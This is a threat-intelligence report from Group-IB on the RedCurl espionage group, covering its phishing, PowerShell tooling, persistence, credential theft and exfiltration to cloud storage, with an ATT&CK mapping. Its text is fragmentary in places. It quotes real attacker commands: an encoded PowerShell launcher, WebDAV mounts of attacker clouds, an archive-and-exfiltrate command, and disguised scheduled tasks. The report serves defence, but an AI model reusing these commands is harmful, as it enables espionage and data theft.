REDCURL
The pentest you didn’t know about
group-ib.com
AUGUST 2020
2
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
© Group−IB, 2020
Restrictions
1. The report was written by Group-IB experts without any third-
party funding.
2. The report provides information on the tactics, tools, and
infrastructure of the previously unknown group RedCurl. The
report’s goal is to minimize the risk of the group committing
further illegal acts, suppress any such activity in a timely
manner, and raise awareness among readers. The report also
contains indicators of compromise that organizations and
specialists can use to check their networks for compromise,
as well as recommendations on how to protect against future
attacks. Technical details about threats are provided solely
for information security specialists so that they can familiarize
themselves with them, prevent similar incidents from occurring
in the future, and minimize potential damage. The technical
details about threats outlined in the report are not intended
3. The report is for information purposes only and is limited
in distribution. Readers are not authorized to use it for
commercial purposes and any other purposes not related
to education or personal non-commercial use. Group-IB grants
readers the right to use the report worldwide by downloading,
citation, provided that the report itself (including a link to the
copyright holder’s website on which it is published) is given
as the source of the quote.
4. The entire report is subject to copyright and protected
by applicable intellectual property law. It is prohibited to copy,
distribute (including by placing on websites), or use the
information or other content without the right owner’s prior
written consent.
If Group-IB’s copyright is violated, Group-IB will have the right
to approach a court or other state institution to protect its
rights and interests and seek punishment for the perpetrator
as provided by law, including recovery of damages.
3
© GROUP−IB
CONTENTS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Introduction 4
Channel1 aka RedCurl.C1 and Channel2 aka RedCurl.C2 26
Commands 26
RedCurl, CloudAtlas and RedOctober:
campaign comparison 30
MITRE ATT&CK® Mapping
(RedOctober/Cloud Atlas/Inception) 33
Contents
* The chapter is available in the full version only
4
© GROUP−IB
INTRODUCTION
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Introduction
One summer evening in 2019,
received a call from a new customer
who said that their company had been attacked. They asked for
help in eliminating the incident’s aftermath and identifying the
hacker group responsible.
The duty CERT-GIB analyst examined the phishing email used
at the initial infection stage. It was particularly well-written, which
suggested that this was a planned targeted attack. The unique
in , a module,
-
team about the
incident and within a couple of hours the customer was informed
about the targeted attack against their business.
Meanwhile, the email sample and the attack details caught the
attention of Group-IB’s Threat Intelligence & Attribution spe-
cialists. The campaign conducted by the hacker group (unknown
at the time) involved unique tools written in PowerShell, which
is popular among IT specialists. Moreover, the emails targeted
-
nization as a whole. It became obvious that it was not an ordinary
cybercriminal group seeking to steal money. Group-IB specialists’
: namely that espionage- and
sabotage-oriented APT groups had come to play an increasingly
prominent role on the hacker scene. One such group was the one
in question: .
In each analyzed campaign, the group’s goal was to conduct espi-
onage. The attackers infected computers in targeted departments
group’s possible victims was an employee at a cybersecurity com-
pany that protects its customers against such attacks. Detected
incidents related to this threat group took place in various indus-
tries and had a wide geographical scope: from Russia to North
America. As such, it is likely that the attacks were ordered for the
purpose of corporate espionage. This hypothesis is reinforced
by the fact that the group acted as covertly as possible in order
to minimize the risk of being discovered on the victim’s network.
For instance, RedCurl did not use actively communicating Trojans
or remote administration tools with a graphical interface.
It should also be noted that RedCurl uses techniques similar
to those used by Red Teaming and penetration testing specialists.
A cyber espionage hacker group
is to conduct corporate espionage:
steal documents containing
commercially sensitive information
The group acted as covertly as possible
to minimize the risk of being discovered
on the victim’s network: RedCurl did
not use actively communicating Trojans
or remote administration tools
5
© GROUP−IB
INTRODUCTION
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
and infrastructure of RedCurl, a previously unknown group. In addi-
chain, which were prepared by specialists at
, as well as unique data collected during incident
response operations related to campaigns attributed to RedCurl.
As part of their research, Group-IB’s digital forensics experts veri-
-
lar to those involved in the RedOctober and CloudAtlas campaigns,
whose goal is also espionage. An in-depth analysis based on the
MITRE ATT&CK® matrix did not reveal unambiguous links between
these campaigns, however.
Indicators of compromise are given at the end of the report
of RedCurl’s victims. YARA and Suricata rules, however, are only
available to customers.
Traditionally, the report features recommendations from
Group-IB experts on preventive measures to help protect against
the group’s attacks.
6
© GROUP−IB
KEY FINDINGS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Key findings
RedCurl (given by Group-IB)
Corporate espionage and theft of documents
2018 to present. Over more than two years, Group-IB has
detected 26 targeted attacks
Russia, Ukraine, Canada, Germany, the United Kingdom, Norway
The group is presumably Russian-speaking
RedCurl created a set of PowerShell programs that can cumula-
tively be called a framework and that includes:
• Droppers (including an initial dropper, InitialDropper)
• Key module FirstStageAgent (aka FSA)
• Two submodules called Channel1 (aka FSA.C1)
and Channel2 (aka FSA.C2)
Figure 1. Trojan unpacking diagram
The Trojan receives commands from its operator through a cloud
in the form of BAT scripts, which are simply subprograms. A total
7
© GROUP−IB
KEY FINDINGS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Figure. 2. Diagram of Trojan-operator interactions through the cloud
• Minimal use of binary code.
• Use of anti-detection techniques.
• Control over an infected computer through commands kept
in a legitimate cloud storage. The commands are sent as Power-
Shell scripts.
• Special scripts for displaying fake Outlook windows to intercept
the logins and passwords of targeted individuals.
• The group usually remains in the victim’s network for two to six
months. The stage of spreading over the network is stretched
over a long time to remain unnoticed for as long as possible.
To achieve this, the group does not use any actively communi-
cating Trojans or remote-control tools via RDP.
RedCurl uses cloud services such as cloudme.com, koofr.net,
pcloud.com, idata.uz, drivehq.com, driveonweb.de, opendrive.com,
powerfolder.com, docs.live.net, syncwerk.cloud, cloud.woelkli.com,
and framagenda.org. To manage and access clouds, the threat
actors use the service multcloud.com.
info
commands
check
exfiltration
8
© GROUP−IB
GEOGRAPHICAL SCOPE AND TARGETS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Geographical scope
and targets
All RedCurl attacks are targeted, i.e. emails and droppers are tai-
only malware modules were discovered (rather than the initial
dropper, which can reveal the target).
• Construction companies
• Retailers
• Travel agencies
• Insurance companies
• Financial companies
• Banks
•
• Russia
• Ukraine
• Canada
• Germany
• The United Kingdom
• Norway
that have become victims
of RedCurl’s espionage attacks, some on several occasions.
Group-IB specialists contacted each of them and provided recom-
mendations on further steps to eliminate the consequences of the
attacks. Names of victims are not disclosed. At the time of writing,
some of the companies continue to respond to the incidents.
Analysis of the customer’s compromised data revealed a set
of data relating to a team lead at a cybersecurity company. The
IP addresses that communicated with RedCurl’s cloud belong
to the company in question. It is impossible to determine whether
this data was compromised or whether this was an instance
of controlled analysis of the Trojan by researchers.
Figure 3. Timeline
of RedCurl attacks
9
© GROUP−IB
INITIAL ACCESS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Initial access
As is the case with many espionage campaigns, initial access
to targeted infrastructures in RedCurl attacks involves
spear-phishing emails. RedCurl’s distinctive feature, however,
is that the email content is carefully drafted. For instance, the
emails displayed the targeted company’s address and logo, while
the sender address featured the company’s domain name.
The attackers posed as members of the HR team at the targeted
organization and sent out emails to multiple employees at once,
which made the employees less vigilant, especially considering
that many of them worked in the same department.
To deliver the payload, RedCurl used archives, links to which
were placed in the email body. Despite the fact that the links
redirected to public cloud storage services, the way they were
disguised tricked users into thinking that they were visiting the
Figure 4. Example of a spear-phishing email sent by RedCurl
Were used by the group to get initial
access to targeted companies
10
© GROUP−IB
INITIAL ACCESS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Figure 5. Example of a spear-phishing email sent by RedCurl
Figure 6. Technical records of the domain mailsecure[.]tech
The phishing emails were sent using the domain name
name had been registered six months before the campaign was
launched, on December 6, 2018. On the day of the attack, the SOA
11
© GROUP−IB
INITIAL ACCESS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Naturally, the websites belonging to the targeted organizations
did not host the archive, which was stored in the cloud, most
often Dropbox. In addition to Dropbox, RedCurl’s campaigns also
involved free hosting services, especially Byethost and AttractSoft:
http://********.byethost22.com/3/%D0%9F%D0%BE%D0%BB%D0%BE%D0
%B6%D0%B5%D0%BD%D0%B8%D0%B5%20%D0%BE%20%D0%B5%D0%B6%D0%B5%D0%
B3%D0%BE%D0%B4%D0%BD%D0%BE%D0%BC%20%D0%BF%D1%80%D0%B5%D0%BC%
D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B8%20%D1%81%D0
%BE%D1%82%D1%80%D1%83%D0%B4%D0 %BD%D0%B8%D0%BA%D0%BE%D0%B2.7z
http://********.byethost7.com/dl/********.7z
http://logs99.atwebpages.com/********/reports/
002838177363613567218367647/actual/report.php
http://mtpon34.myartsonline.com/report/2890000027835616636545613/
actual/report.php
an attacker-controlled cloud storage was set up on the local
system as a network drive and launched , which
was hosted there, after which a phishing document was displayed
to the victim.
In the attacks observed in 2019, victims downloaded an archive
-
suspicions.
In RedCurl’s earlier campaigns carried out in 2018, the utility
to launch the module FirstStageAgent_light. In addition to the
resources necessary for displaying the contents correctly. When
Figure 7. Example
of a downloaded
extension made
invisible
Figure 8. MHT InitialDropper
on the victim’s computer
12
© GROUP−IB
INITIAL ACCESS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
was launched
using Windows PowerShell. In addition, the contents of the phish-
ing document or web page were displayed.
RedCurl.FirstStageAgent was distributed in a similar way, using
JavaScript. When it was launched, the victim was shown a legit-
imate web page that asked them to download, install, or re-in-
of RedCurl’s toolset can be found in thesection.
Figure 9. Types of Trojans in 2018, 2019, and 2020
13
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Trojan execution
and persistence
inthe system
The vast majority of tools used in RedCurl campaigns are Windows
PowerShell scripts. For instance, a PowerShell script was used
to launch RedCurl.Dropper and set up cloud storage as a network
drive. Below is one such example:
powershell.exe -enc
“JgAgACIAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgAgAEAAKAAiAHMAZABtAD
UALgBkAGwAbAAsAG8AQgBTAGkAUQBTAFUASQBTAHIAUwB5AE4AYQBJAGEAagBQA
HAAaQBWAFUAUQBCAE0AZwBBACIAKQA7ACAAbgBlAHQAIAB1AHMAZQAgAGgAdAB0
AHAAcwA6AC8ALwBhAHAAcAAuAGsAbwBvAGYAcgAuAG4AZQB0AC8AZABhAHYAIAB
uADYAegByAHMAcwA5AGQAbwBxAG8AagA2AGkAdQAxACAALwB1AHMAZQByADoAZg
BvAHkAdQBiAEAAdABoAGUAdABlAG0AcABtAGEAaQBsAC4AYwBvAG0AOwAgAG4AZ
QB0ACAAdQBzAGUAIABcAFwAYQBwAHAALgBrAG8AbwBmAHIALgBuAGUAdABAAFMA
UwBMAFwAZABhAHYAIAAvAEQARQBMAEUAVABFADsA”
“rundll32.exe” @(“sdm5.dll,oBSiQSUISrSyNaIajPpiVUQBMgA”);
net use https://app.koofr.net/dav PASSWORD
/user:[email protected];
net use \\app.koofr.net@SSL\dav /DELETE;
opening stage. In such cases, a shortcut with a module launch
command is created in the Startup directory.
RedCurl.Dropper, which is a library, is launched using
rundll32.exe. RedCurl.FSA and the additional modules
RedCurl.FSA.C1 and RedCurl.FSA.C2, on the other hand,
are extracted from a CAB archive.
In earlier attacks that took place in 2018, the additional modules
Channel1 and Channel2 were downloaded from the cloud. In the
most recent attacks, the modules were located in the same CAB
archive as FirstStageAgent, while RedCurl.Dropper itself was
launched from a network drive set up during the initial access
stage.
These tools helped the attackers download additional PowerShell
goals) from cloud storage spaces and execute them. A detailed
description of the main and additional modules can be found in the
section.
Persistence for both the main and additional modules was estab-
lished by creating scheduled tasks:
/c schtasks /Create /TN “LicenseAcquisitionService\
EnableLicenseAcquisitionTask” /SC hourly /ST 02:26 /
tr “wscript.exe /B \”C:\Users\admin\AppData\Roaming\Microsoft\
EnableLicenseAcquisitionS\EnableLicenseAcquisitionF.vbs\”” /F
14
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
In earlier attacks, persistence was ensured also through the Run
keys in the Registry:
New-ItemProperty -Path Registry::HKCU\Software\Microsoft\
Windows\CurrentVersion\Run -Name MicrosoftCurrentUpdatesCheck
-Value “””$Channel1Dir\check.exe”” loop 65000 3600000 execmd
“”cd “”$Channel1Dir”” && call check.bat””” -Force | Out-Null
The names of both scheduled tasks and Registry keys were
to distinguish them from legitimate operating system com-
ponents and applications: MicrosoftCurrentUpdatesCheck,
MDMMaintenenceTask, WindowsActionDialog, etc.
15
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Reconnaissance
andlateral movement
Analysis of RedCurl campaigns revealed that the group remains
in the victim’s network for two to six months on average. The stage
as the group strives to remain unnoticed for as long as possi-
ble and does not use any active Trojans that could disclose its
presence.
By using Windows PowerShell scripts and legitimate cloud ser-
vices, RedCurl reduced detections of the tools they used
to the minimum. As part of incident response operations,
Group-IB specialists observed antivirus software being triggered
by RedCurl.Dropper, but this occurred only after the malware had
been in the system for several months.
The attackers also used Windows PowerShell scripts to collect
information about the compromised system as well as about local
and network drives:
The same scripts were also used to collect information about
email accounts that could later be used for a new round of phish-
ing campaigns.
RedCurl remains in the victim’s network
As part of its campaigns, RedCurl used from the
Sysinternals Suite to collect information about Active Directory:
16
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
In RedCurl campaigns, movement across the network was
in network drives.
Although this tool is intended for working with a graphical inter-
face, the option makes it possible to launch it from the
command line and save a copy of the Active Directory database
Unlike many other espionage groups, RedCurl does not seek
to gain access to systems using the Remote Desktop Protocol
or similar. Instead, the group sticks to tools with a command line
interface using SSH for interactive access, for example.
By using a Windows PowerShell script, the attackers created LNK
shortcuts for , and
on network drives and turned on the “hidden” attribute for the original
launch RedCurl.Dropper together with it.
were located on the network drive. Although this propagation method
security systems.
Used by RedCurl to substitute ,
,,,, and
launch RedCurl.Dropper
17
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
at Group-IB’s Digital Forensics Lab were able to determine that these
that normally does not contain such traces.
In addition to Windows PowerShell scripts, RedCurl’s arsenal
includes other tools. To harvest credentials, for instance, the attack-
ers use an increasingly popular tool called , which helps
as those saved in the victim’s browser. This tool is written in Python
and is delivered to compromised hosts together with the Python
interpreter. To reduce the likelihood of LaZagne being detected, the
attackers used , which helped obfuscate its code.
The tool used by RedCurl to extract
passwords not only from memory but
in the victim’s browser
Moreover, a PowerShell script that displayed a phishing
pop-up Microsoft Outlook window to the victim was used to collect
authentication data.
checked for validity. This way, if a targeted organization did not
have multi-factor authentication in place, the attackers could gain
access to compromised users’ email accounts even if the required
data was not obtained through LaZagne.
used by RedCurl to reduce the likelihood
of RedCurl.Dropper being detected and
obfuscate its code
18
© GROUP−IB
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Data exfiltration
RedCurl focuses on compromising email. The attackers had
Apart from scripts, in some cases the hackers also used other
service.
The hackers searched both local drives and corporate network
•
• Construction documentation
• Legal action documents
• Internal documents
19
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Tools
The entire set of the group’s custom tools is written in PowerShell.
When these tools are in operation, third-party programs are
additionally downloaded, including ones written in Python.
RedCurl’s custom tools include:
• RedCurl.InitialDropper
• RedCurl.Dropper
• RedCurl.FSA aka FirstStageAgent
• RedCurl.FSA.C1 + RedCurl.FSA.C2
• RedCurl.Commands
Figure 10. Diagram showing FSA with its modules and commands
The entire set of RedCurl’s custom
tools is written in PowerShell
20
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
or 7z archive with a PDF icon. This has not always been the case,
however. Analysis of historical data revealed:
•
•
• LNK_Dropper, an MS Windows shortcut
Launching it will unpack a decoy document, a malicious DLL
shell script.
The user will be shown the decoy document while the system utility
cmd.exe command line interpreter and the extracted BAT script.
This will result in the launch of a PowerShell script that will set
up a cloud storage as a network drive using the system utility net.exe:
net use \\app.koofr.net@SSL\dav /DELETE;
net use https://app.koofr.net/dav PASSWORD
/user:[email protected];
Next, the script will use the system utility rundll32.exe to launch the
dropper as the malicious library RedCurl.Dropper:
“rundll32.exe” @(“sdm5.dll,oBSiQSUISrSyNaIajPpiVUQBMgA”);
21
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
When Dropper is launched, tasks are created, which ensures the
persistence of the key module RedCurl.FSA and the two “chan-
nels,” RedCurl.FSA.C1 and RedCurl.FSA.C2.
C:\Windows\System32\cmd.exe
/c schtasks /Create /TN «WsSwapAssessmentTask» /SC hourly /
MO 4 /ST 00:20 /tr «wscript.exe /B \»C:\Users\John\AppData\Local\
Microsoft\WsSwapAssessmentTaskF\WsSwapAssessmentTaskS.vbs\»» /F
C:\Windows\System32\cmd.exe /c schtasks /Create /
TN «IndexerAutomaticMaintenance\IndexerAutomaticMaintenanceTask» /
SC hourly /ST 01:38 /tr «wscript.exe /B \»C:\Users\John\AppData\
Roaming\IndexerAutomaticMaintenanceF\IndexerAutomaticMaintenance.
vbs\»» /F
C:\Windows\System32\cmd.exe /c schtasks /Create /
TN «LicenseAcquisitionService\EnableLicenseAcquisitionTask» /
SC hourly /ST 02:13 /tr «wscript.exe /B \»C:\Users\John\AppData\
Roaming\Microsoft\EnableLicenseAcquisitionS
EnableLicenseAcquisitionF.vbs\»» /F
The program then extracts and saves a CAB archive to the disk,
creates a new directory, and unpacks the contents of the CAB
archive into that directory.
The archive contains the , which has traditionally
been used to create and unpack archives. All command mod-
ules are encrypted using 7-Zip, which is also actively used
by RedCurl’s Trojan. The archive also contains a utility called curl,
which sends requests and ensures communication with the
C&C server.
22
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
FirstStageAgent is designed to perform the following functions:
1. Extract the modules RedCurl.Channel1 and RedCurl.Channel2.
2. Upload information about the infected machine.
3. Download and execute a new command (module).
The FSA key module connects to the cloud service to upload data
and obtain commands. The commands are sent as BAT scripts, the
body of which usually contains a PowerShell script or an encoded
23
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Download of a module with commands
script (this step may be omitted)
Launch of the main part of the module
Along with the FSA key module, two auxiliary modules are installed:
FSA.Channel1 aka C1 and FSA.Channel2 aka C2. They act in the
to communicate with the cloud.
RedCurl uses cloud services such as cloudme.com, koofr.net,
pcloud.com, idata.uz, drivehq.com, driveonweb.de, opendrive.com,
powerfolder.com, and docs.live.net.
The modules RedCurl.Channel1 and RedCurl.Channel2 are stored
in password-protected archives. The key for the archives is con-
FirstStageAgent extracts the contents of the archives using the
“syspack.exe” utility. If the operation is successful, the
directory with the modules. Examples of commands for
extracting content from archives are presented below:
.\syspack.exe x -aoa -p${fPass} $Channel1_path -o${Channel1Dir};
.\syspack.exe x -aoa -p${fPass} $Channel2_path -o${Channel2Dir};
The program communicates with operators by reading and writ-
FirstStageAgent uses the WebDav technology, which allows for
cloud are performed using the . FirstStageAgent
to make requests to the cloud.
Figure 14. FSA operation algorithm
24
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
All downloads from and uploads to the cloud are carried out
using the curl utility. Prior to sending, data is encrypted using
the 7-Zip utility.
Before obtaining commands, FirstStageAgent logs
the start time. To do so, the program adds the user-
name as well as the current date and time to the end
on the cloud service. The message is formed by the command
actions, FirstStageAgent takes the following steps:
1.
to the folder with the module.
2. Adds the username as well as the current time and date
3.
from the cloud.
4.
5.
It is worth noting that modules are stored on the infected sys-
tem in encrypted form. The modules are encrypted using the
ConvertTo-SecureString function based on the AES algorithm.
A random sequence of bytes is used as a key. The decryption key
is always new for each attack and each module.
info
commands
check
exfiltration
Figure 15. Diagram of Trojan-operator interactions through the cloud
25
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
object. The ConvertTo-SecureString method is used to decrypt the
module. The decryption key is located within the FirstStageAgent
each attack. Apart from encryption, the data is Base64-encoded.
Below is a code section responsible for decryption:
function Decrypt-CMD([BYTE[]] $key) {
$path = «.\tempexec\cmd.txt»;
$cmdname = -join ((48..57) + (97..122) | Get-Random -Count 8 | %
{[char]$_});
$dec = Get-Content $path | ConvertTo-SecureString -Key $key;
$Ptr = [System.Runtime.InteropServices.
Marshal]::SecureStringToCoTaskMemUnicode($dec);
$result = [System.Runtime.InteropServices.
Marshal]::PtrToStringUni($Ptr);
[System.Runtime.InteropServices.
Marshal]::ZeroFreeCoTaskMemUnicode($Ptr);
$bytes=[Convert]::FromBase64String($result);
$bytes | Set-Content «.\tempexec\${cmdname}.bat» -Encoding Byte
-Force;
Start-Sleep 10;
Remove-Item .\tempexec\cmd.txt -Force; return $cmdname;
}
from which the FirstStageAgent module is launched. The module
decrypts it using the above algorithm (ConvertTo-SecureString
-> Base64). The decrypted module is written to the same direc-
tory. A random sequence of 8 characters is generated as a name
deleted using the utility.
As such, all communications between the threat actor and the
compromised infrastructure are carried out using legitimate
cloud services.
26
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
The modules Channel1 and Channel2 have the same functions.
Their main goal is to upload information about the infected device,
then download and execute a new module with commands. The
encryption method and the algorithm for receiving and sending
-
ent accounts to access the cloud storage.
-
municate with the cloud storage. Channel1 and FirstStageAgent
use the “curl.exe” utility to interact with the cloud, while Channel2
mounts a network drive into the system. Mounting is carried out
located in the cloud are performed using console commands.
An example of a command used to mount a network drive is pre-
sented below:
net use https://storage.driveonweb.de/probdav $pass /user:$login /
persistent:no;
Another feature that distinguishes Channel2 from Channel1 is the
way of launching the decrypted module with commands. Channel2
exe”. The path to the module is passed as an argument. Once the
script is run, a “WScript.Shell” object is created, which is then used
-
sented below:
On Error Resume Next
CreateObject(«Wscript.Shell»).Run «»»» & WScript.Arguments(0) &
«»»», 0, False
Channel1 launches the decrypted module in the same way
as FirstStageAgent.
The FirstStageAgent, Channel1, and Channel2 modules only download
and execute commands (modules) in the “cmd.exe” command-line
-
mands that extend the Trojan’s functionality. This means that these
Trojan commands are subprograms or modules.
Certain modules can execute PowerShell commands. In such cases,
Modules can contain commands to download additional software.
located in the cloud. Additional programs required for the Trojan
to operate are located in the cloud directory. It is worth noting that
with commands use the same account. The same module can run
they are running to avoid restarting on the same machine. If the
computer name matches one of the values on the list, the module will
continue with the execution.
27
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Each module starts by creating a temporary directory to save the
result of its operation. The directory that stores a module that
launched the command is used as a working directory. The directory
-
ules analyzed, the directory names are based on the following pat-
The output of each command is added to a password-protected
archive. To create the archive, a console version of the 7-Zip program
(syspack.exe) is used. The program is delivered to the infected device
they are removed from the system. The archive name is generated
using the following template:
%computername%_%username%_%%CMD_NAME%%_[%random%]_
[%DD%%MM%|%MM%%DD%]_%HH%%MM%.tmp.
The month and day will be determined correctly only if the “DD.
MM.YYYY” or “MM.DD.YYYY” date format is set in the system. The
used to create an archive is presented below:
syspack.exe a -p%packpass% -mhe=on -sdel -y \\app.koofr.net@SSL\
dav\Koofr\STR\%ARCH_NAME% %LOG_FOLDER%
Modules were named based on the value of the %CMD_NAME%
Collects information about the infected system
Collects information from Active Directory
Collects information about users in Active Directory
Harvests credentials from the infected machine using LaZagne
Collects logs from the infected machine. In some cases, it deter-
mines the contents of a directory located on the local network
Collects a list of computers on the local network
Obtains a list of available network drives at the address
28
© GROUP−IB
TOOLS
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Removes traces of compromise from the infected machine
Collects system information along with credentials
Checks the internet connection
Obtains a list of available resources for computers within the local
network
cre Creates a fake window for entering the computer account
password
Same as the cre module
2 Alive
Collects a list of directories on network drives that have
write access
29
© GROUP−IB
ATTRIBUTION
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Attribution
RedCurl’s focus on espionage and the use of public cloud ser-
vices may indicate that its campaigns are a continuation of the
RedOctober and CloudAtlas campaigns described by
in the past (https://securelist.ru/cloud-atlas-stilnoe-vozvrash-
henie-art-kampanii/24716/, https://securelist.com/recent-cloud-at-
las-activity/92016/). These cyberespionage attacks targeted
industrial, governmental, and commercial organizations in Russia,
Central Asia, and Ukraine. They were carried out between 2010
and 2019. At the time of writing, there is no information about
attacks involving CloudAtlas tools in 2020.
RedCurl, discovered by Group-IB experts, carried out attacks
-
est attack dates back to May 2018. Its victims included companies
based in the UK, Canada, Norway, Germany, Russia, and Ukraine. All
the companies were private and commercial.
As such, based on the geographical scope of attacks, it is impossi-
Lab.
-
by the strings in the section with resources. Moreover, Russian was
Figure 16. Language in the cloud
web interface
30
© GROUP−IB
ATTRIBUTION
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Phishing document
containing the following
exploits:
Phishing document
containing the following
exploits:
• Obtains information about the infected machine
•
• Obtains a directory listing
• Propagates across the compromised network
• Sets up access to the
compromised machine
via SSH
• Creates a phishing
window with a form
for entering domain
account credentials
• Keylogger
• Takes screenshots
•
mobile devices
• Extracts passwords using the LaZagne tool
Substitutes original
documents on a network
Scans network
computers for the
MS08-067 vulnerability
LaZagne, 7-Zip
ADExplorer
NirCmd
SSH
curl
The RedOctober, CloudAtlas, and RedCurl campaigns all involved
a modular Trojan. The C&C servers sent commands in separate
modules. The RedOctober campaigns and early CloudAtlas attacks
like the RedCurl campaign. However, the tools used in RedCurl
attacks are unprecedented and written in PowerShell. The lat-
est CloudAtlas attacks also used a new PowerShell tool, which
reveal overlaps in the code with any RedCurl tools. LaZagne was
used to retrieve passwords as part of all the campaigns. A detailed
comparison between the campaigns based on the
MITRE ATT&CK® matrix is presented below.
31
© GROUP−IB
ATTRIBUTION
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Procedure
T1566.002:
Spearphishing link
to gain initial access to the target host.
T1204.002:
Malicious File
T1059.003: Windows
Command Shell
The cybercriminals used cmd.exe to execute batch scripts.
T1059.001:
PowerShell
The cybercriminals used PowerShell scripts to perform post-
exploitation tasks.
T1059.005:
T1053.005:
Scheduled Task
The cybercriminals created tasks in the scheduler to achieve
persistence on compromised systems.
T1547.001: Registry
Run Keys / Startup
Folder
persistence on compromised systems.
T1027: Obfuscated
Files or Information
The cybercriminals encrypted data and Base64-encoded
PowerShell commands.
T1036.005: Match
Legitimate Name
or Location
The cybercriminals masked their scripts and tasks in the scheduler
using names similar to legitimate ones.
T1070.004: File
Deletion
The cybercriminals removed batch scripts immediately after
execution.
T1564.001: Hidden
Files and Directories
The cybercriminals added the “hidden” attribute to malicious
T1218.011: Rundll32 The cybercriminals used rundll32.exe to launch RedCurl.Dropper.
T1003.001: LSASS
Memory
The cybercriminals used LaZagne to extract passwords from
volatile memory.
T1555.003:
Credentials from Web
Browsers
The cybercriminals used LaZagne to extract passwords stored
by web browsers.
T1552.001:
Credentials in Files
The cybercriminals used LaZagne to extract passwords stored
T1552.002:
Credentials
in Registry
The cybercriminals used LaZagne to extract passwords stored
in the registry.
T1056.002: GUI
Input Capture
The cybercriminals used a phishing Microsoft Outlook
pop-up to intercept login credentials.
32
© GROUP−IB
ATTRIBUTION
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Procedure
T1082: System
Information
Discovery
The cybercriminals regularly collected information about
compromised systems.
T1035: Network Share
Discovery
The cybercriminals collected information about network drives
available to compromised hosts.
T1083: File and
Directory Discovery
network drives.
T1087.001: Local
Account
The cybercriminals collected information about local accounts.
T1087.002: Domain
Account
The cybercriminals collected information about domain accounts.
T1087.003: Email
Account
The cybercriminals collected information about email accounts.
T1080: Taint Shared
Content
which allowed them to propagate across the network.
T1119: Automated
Collection
The cybercriminals used batch scripts to collect data.
T1005: Data from
Local System
The cybercriminals collected data from the local disks
of compromised systems.
T1039: Data from
Network Shared Drive
The cybercriminals collected data from network drives.
T1114.001: Local Email
Collection
The cybercriminals collected emails.
T1102: Web Service The cybercriminals used legitimate web services to download
malicious batch scripts.
T1071.001: Web
Protocols
The cybercriminals used the HTTP, HTTPS, and WebDav protocols
to perform network connections.
T1020: Automated
T1537: Transfer Data
to Cloud Account
The cybercriminals used cloud storage devices to copy data.
33
© GROUP−IB
ATTRIBUTION
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Procedure
T1566.001:
Spearphishing
Attachment
The cybercriminals used phishing emails with malicious
attachments to gain initial access.
T1204.002:
Malicious File
The device becomes infected as soon as the victim opens the
malicious document.
T1059.001:
PowerShell
The cybercriminals used PowerShell scripts during post-
exploitation tasks.
T1059.005:
T1203: Exploitation
for Client Execution
malicious code.
T1547.001: Registry
Run Keys / Startup
Folder
persistence on compromised systems.
T1027: Obfuscated
Files or Information
The cybercriminals used AES and RC4 algorithms to encrypt the
payload.
T1218.010: Regsvr32 The cybercriminals used regsvr32.exe to launch malicious DLLs.
T1218.005: Mshta
execute malicious code.
T1221: Template
Injection
The cybercriminals used malicious documents to download the
payload from a remote server over HTTP.
T1003.001: LSASS
Memory
The cybercriminals used LaZagne to extract passwords from
volatile memory.
T1555.003:
Credentials from
Web Browsers
The cybercriminals used LaZagne to extract passwords stored
by web browsers.
T1552.001:
Credentials in Files
The cybercriminals used LaZagne to extract passwords stored
T1552.002:
Credentials
in Registry
The cybercriminals used LaZagne to extract passwords stored
in the registry.
34
© GROUP−IB
ATTRIBUTION
REDCURL: THE PENTEST YOU DIDN`T KNOW ABOUT
Procedure
T1082: System
Information
Discovery
The cybercriminals regularly collected information about
compromised systems.
T1083: File and
Directory Discovery
and network drives.
T1087.001: Local
Account
The cybercriminals collected information about local accounts.
T1087.002: Domain
Account
The cybercriminals collected information about domain accounts.
T1518: Software
Discovery
The cybercriminals collected information about the software
installed on the compromised hosts.
T1119: Automated
Collection
The cybercriminals used batch scripts to collect data.
T1005: Data from
Local System
The cybercriminals collected data from the local disks of the
compromised systems.
T1039: Data from
Network Shared Drive
The cybercriminals collected data from network drives.
T1102: Web Service The cybercriminals used legitimate web services to download
malicious batch scripts.
T1071.001: Web
Protocols
The cybercriminals used the HTTP, HTTPS, and WebDav protocols
to perform network connections.
